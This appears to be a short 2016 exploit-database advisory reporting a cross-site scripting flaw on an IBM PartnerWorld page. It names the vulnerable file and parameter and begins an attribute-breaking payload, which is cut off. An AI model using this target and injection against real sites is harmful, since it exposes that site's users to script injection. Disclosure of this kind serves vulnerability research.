# Exploit Title: IBM Security WebSite Cross-Site Scripting # Google Dork: N/A # Date: 2016/2/5 # Exploit Author: RootByte # Vendor Homepage: www.ibm.com/security/ # Software Link: N/A # Version: N/A # Tested on: Windows 10 / FireFox 44.0 # CVE : N/A ~ # about (Wikipedia): International Business Machines Corporation (commonly referred to as IBM) is an American multinational technology and consulting corporation, with corporate headquarters in Armonk, New York. IBM manufactures and markets computer hardware, middleware and software, and offers infrastructure, hosting and consulting services in areas ranging from mainframe computers to nanotechnology. # POC: ~ # Vulnerable Location: http://www-03.ibm.com/partnerworld/wps/ File: pwselector.jsp ~ # Variable: vichPageId ~ # Using this script for XSS Vunerability Testing: ">